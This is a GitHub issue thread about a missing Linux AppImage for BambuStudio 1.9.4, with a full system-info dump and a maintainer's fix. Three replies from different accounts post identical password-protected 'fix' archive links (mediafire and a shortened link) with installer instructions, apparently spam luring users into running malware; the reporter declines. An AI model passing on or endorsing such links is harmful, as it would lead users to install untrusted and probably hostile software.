bambulab/BambuStudio #4697: AppImage missing for linux ubuntu for release 1.9.4

longrackslabs, 2024-08-27:
### Bambu Studio Version

1.9.4

### Where is the application from?

Bambu Lab github releases

### OS version

Linux Mint 21.3

### Additional system information

System:
  Kernel: 5.15.0-117-generic x86_64 bits: 64 compiler: gcc v: 11.4.0 Desktop: Cinnamon 6.0.4
    tk: GTK 3.24.33 wm: muffin vt: 7 dm: GDM3 42.0, LightDM 1.30.0 Distro: Linux Mint 21.3 Virginia
    base: Ubuntu 22.04 jammy
Machine:
  Type: Desktop System: Micro-Star product: MS-7C56 v: 1.0 serial: <superuser required>
  Mobo: Micro-Star model: MPG B550 GAMING PLUS (MS-7C56) v: 1.0 serial: <superuser required>
    UEFI: American Megatrends LLC. v: 1.F0 date: 10/11/2023
Battery:
  Device-1: hidpp_battery_0 model: Logitech MX Keys Wireless Keyboard serial: <filter>
    charge: 50% (should be ignored) rechargeable: yes status: Discharging
CPU:
  Info: 8-core model: AMD Ryzen 7 5800X bits: 64 type: MT MCP smt: enabled arch: Zen 3 rev: 0
    cache: L1: 512 KiB L2: 4 MiB L3: 32 MiB
  Speed (MHz): avg: 3274 high: 4593 min/max: 2200/3800 boost: enabled cores: 1: 3318 2: 3602
    3: 2607 4: 2515 5: 3776 6: 3863 7: 3403 8: 3471 9: 3085 10: 3608 11: 4593 12: 3654 13: 2933
    14: 2342 15: 3040 16: 2577 bogomips: 121599
  Flags: avx avx2 ht lm nx pae sse sse2 sse3 sse4_1 sse4_2 sse4a ssse3 svm
Graphics:
  Device-1: NVIDIA GM206 [GeForce GTX 950] vendor: PNY driver: nvidia v: 535.183.01 pcie:
    speed: 8 GT/s lanes: 16 ports: active: none off: HDMI-A-1 empty: DP-1,DVI-D-1,DVI-I-1
    bus-ID: 2b:00.0 chip-ID: 10de:1402 class-ID: 0300
  Display: x11 server: X.Org v: 1.21.1.4 driver: X: loaded: nvidia
    unloaded: fbdev,modesetting,nouveau,vesa gpu: nvidia display-ID: :0 screens: 1
  Screen-1: 0 s-res: 2560x1440 s-dpi: 122 s-size: 533x302mm (21.0x11.9") s-diag: 613mm (24.1")
  Monitor-1: HDMI-0 res: 2560x1440 hz: 60 dpi: 124 size: 526x296mm (20.7x11.7")
    diag: 604mm (23.8")
  OpenGL: renderer: NVIDIA GeForce GTX 950/PCIe/SSE2 v: 4.6.0 NVIDIA 535.183.01
    direct render: Yes
Audio:
  Device-1: NVIDIA GM206 High Definition Audio vendor: PNY driver: snd_hda_intel v: kernel pcie:
    speed: 8 GT/s lanes: 16 bus-ID: 2b:00.1 chip-ID: 10de:0fba class-ID: 0403
  Device-2: AMD Starship/Matisse HD Audio vendor: Micro-Star MSI driver: snd_hda_intel v: kernel
    pcie: speed: 16 GT/s lanes: 16 bus-ID: 2d:00.4 chip-ID: 1022:1487 class-ID: 0403
  Sound Server-1: ALSA v: k5.15.0-117-generic running: yes
  Sound Server-2: PulseAudio v: 15.99.1 running: yes
  Sound Server-3: PipeWire v: 0.3.48 running: yes
Network:
  Device-1: Realtek RTL8111/8168/8411 PCI Express Gigabit Ethernet vendor: Micro-Star MSI
    driver: r8169 v: kernel pcie: speed: 2.5 GT/s lanes: 1 port: f000 bus-ID: 2a:00.0
    chip-ID: 10ec:8168 class-ID: 0200
  IF: enp42s0 state: up speed: 1000 Mbps duplex: full mac: <filter>
Bluetooth:
  Device-1: Broadcom BCM20702A0 Bluetooth 4.0 type: USB driver: btusb v: 0.8 bus-ID: 1-6:5
    chip-ID: 0a5c:21e8 class-ID: fe01 serial: <filter>
  Report: hciconfig ID: hci0 rfk-id: 0 state: up address: <filter> bt-v: 2.1 lmp-v: 4.0
    sub-v: 220e hci-v: 4.0 rev: 1000
Drives:
  Local Storage: total: 1.95 TiB used: 845.34 GiB (42.4%)
  ID-1: /dev/nvme0n1 vendor: Western Digital model: WDBRPG5000ANC-WRSN size: 465.76 GiB
    speed: 31.6 Gb/s lanes: 4 type: SSD serial: <filter> rev: 111130WD temp: 40.9 C scheme: GPT
  ID-2: /dev/sda vendor: Western Digital model: WD6400AAKS-22A7B2 size: 596.17 GiB
    speed: 3.0 Gb/s type: N/A serial: <filter> rev: 3B01
  ID-3: /dev/sdb vendor: Western Digital model: WD10EZEX-00BN5A0 size: 931.51 GiB
    speed: 6.0 Gb/s type: HDD rpm: 7200 serial: <filter> rev: 1A01 scheme: MBR
Partition:
  ID-1: / size: 365.24 GiB used: 47.98 GiB (13.1%) fs: ext4 dev: /dev/nvme0n1p2
  ID-2: /boot/efi size: 190.5 MiB used: 6.1 MiB (3.2%) fs: vfat dev: /dev/nvme0n1p1
  ID-3: /home size: 915.82 GiB used: 398.5 GiB (43.5%) fs: ext4 dev: /dev/sdb1
Swap:
  ID-1: swap-1 type: partition size: 93.13 GiB used: 375.2 MiB (0.4%) priority: -2
    dev: /dev/nvme0n1p3
USB:
  Hub-1: 1-0:1 info: Hi-speed hub with single TT ports: 10 rev: 2.0 speed: 480 Mb/s
    chip-ID: 1d6b:0002 class-ID: 0900
  Hub-2: 1-2:2 info: Genesys Logic Hub ports: 4 rev: 2.0 speed: 480 Mb/s power: 100mA
    chip-ID: 05e3:0608 class-ID: 0900
  Device-1: 1-5:3 info: Logitech Unifying Receiver type: Keyboard,Mouse,HID
    driver: logitech-djreceiver,usbhid interfaces: 3 rev: 2.0 speed: 12 Mb/s power: 98mA
    chip-ID: 046d:c52b class-ID: 0300
  Device-2: 1-6:5 info: Broadcom BCM20702A0 Bluetooth 4.0 type: Bluetooth driver: btusb
    interfaces: 4 rev: 2.0 speed: 12 Mb/s chip-ID: 0a5c:21e8 class-ID: fe01 serial: <filter>
  Device-3: 1-7:6 info: Micro Star MYSTIC LIGHT type: HID driver: hid-generic,usbhid
    interfaces: 1 rev: 1.1 speed: 12 Mb/s power: 500mA chip-ID: 1462:7c56 class-ID: 0300
    serial: <filter>
  Device-4: 1-10:7 info: Kensington Expert Wireless Trackball Mouse (K72359WW) type: Mouse,HID
    driver: hid-generic,usbhid interfaces: 2 rev: 1.1 speed: 12 Mb/s power: 100mA chip-ID: 047d:8018
    class-ID: 0300
  Hub-3: 2-0:1 info: Super-speed hub ports: 4 rev: 3.1 speed: 10 Gb/s chip-ID: 1d6b:0003
    class-ID: 0900
  Hub-4: 3-0:1 info: Hi-speed hub with single TT ports: 4 rev: 2.0 speed: 480 Mb/s
    chip-ID: 1d6b:0002 class-ID: 0900
  Hub-5: 4-0:1 info: Super-speed hub ports: 4 rev: 3.1 speed: 10 Gb/s chip-ID: 1d6b:0003
    class-ID: 0900
Sensors:
  System Temperatures: cpu: N/A mobo: N/A gpu: nvidia temp: 62 C
  Fan Speeds (RPM): N/A gpu: nvidia fan: 0%
Repos:
  Packages: 3637 apt: 3598 flatpak: 9 snap: 30
  No active apt repos in: /etc/apt/sources.list
  Active apt repos in: /etc/apt/sources.list.d/1password.list
    1: deb [arch=amd64 signed-by=/usr/share/keyrings/1password-archive-keyring.gpg] https: //downloads.1password.com/linux/debian/amd64 stable main
  No active apt repos in: /etc/apt/sources.list.d/additional-repositories.list
  Active apt repos in: /etc/apt/sources.list.d/brave-browser-release.list
    1: deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg arch=amd64] https: //brave-browser-apt-release.s3.brave.com/ stable main
  No active apt repos in: /etc/apt/sources.list.d/docker.list
  Active apt repos in: /etc/apt/sources.list.d/github-cli.list
    1: deb [arch=amd64 signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https: //cli.github.com/packages stable main
  Active apt repos in: /etc/apt/sources.list.d/google-chrome.list
    1: deb [arch=amd64] https: //dl.google.com/linux/chrome/deb/ stable main
  Active apt repos in: /etc/apt/sources.list.d/nordvpn.list
    1: deb https: //repo.nordvpn.com/deb/nordvpn/debian stable main
  Active apt repos in: /etc/apt/sources.list.d/official-package-repositories.list
    1: deb http: //packages.linuxmint.com virginia main upstream import backport
    2: deb http: //archive.ubuntu.com/ubuntu jammy main restricted universe multiverse
    3: deb http: //archive.ubuntu.com/ubuntu jammy-updates main restricted universe multiverse
    4: deb http: //archive.ubuntu.com/ubuntu jammy-backports main restricted universe multiverse
    5: deb http: //security.ubuntu.com/ubuntu/ jammy-security main restricted universe multiverse
  No active apt repos in: /etc/apt/sources.list.d/playonlinux.list
  No active apt repos in: /etc/apt/sources.list.d/steam-beta.list
  Active apt repos in: /etc/apt/sources.list.d/steam-stable.list
    1: deb [arch=amd64,i386 signed-by=/usr/share/keyrings/steam.gpg] https: //repo.steampowered.com/steam/ stable steam
    2: deb-src [arch=amd64,i386 signed-by=/usr/share/keyrings/steam.gpg] https: //repo.steampowered.com/steam/ stable steam
Info:
  Processes: 552 Uptime: 22d 19h 23m wakeups: 735 Memory: 62.72 GiB used: 26.2 GiB (41.8%)
  Init: systemd v: 249 runlevel: 5 Compilers: gcc: 11.4.0 alt: 11/12/9 clang: 14.0.0-1ubuntu1.1
  Client: Cinnamon v: 6.0.4 inxi: 3.3.13

### Printer

Bambu Lab X1X

### How to reproduce

1, Go to: https://github.com/bambulab/BambuStudio/releases
2. Notice there is no AppImage download / install for 1.9.4 release

### Actual results

1, Go to: https://github.com/bambulab/BambuStudio/releases
2. Notice there is no AppImage download / install for 1.9.4 release

### Expected results

1, Go to: https://github.com/bambulab/BambuStudio/releases
2. There should be an AppImage download for ubuntu 1.9.4 (see 1.9.3 and previous releases)

### Project file & Debug log uploads

NA

### Checklist of files to include

- [X] Log file
- [X] Project file

AzEred0, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

yiweifengyan, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

longrackslabs, 2024-08-27:
i don't think i am going to do that (login to some random site).

Would it be a problem to post the AppImage for ubuntu like normal?  Did
something change/break?

G

walterwongbbl, 2024-08-28:
@longrackslabs 
Hi, Previously, when uploading the AppImage , it was not decompressed, but now it can be downloaded.

longrackslabs, 2024-08-29:
neither of the 1.9.5 AppImages load / run for me on Linux Mint.  fyi.

walterwongbbl, 2024-08-30:
@longrackslabs 
It may be caused by incompatible config files. After deletion, the config file will be regenerated.

closed 2024-08-30 by walterwongbbl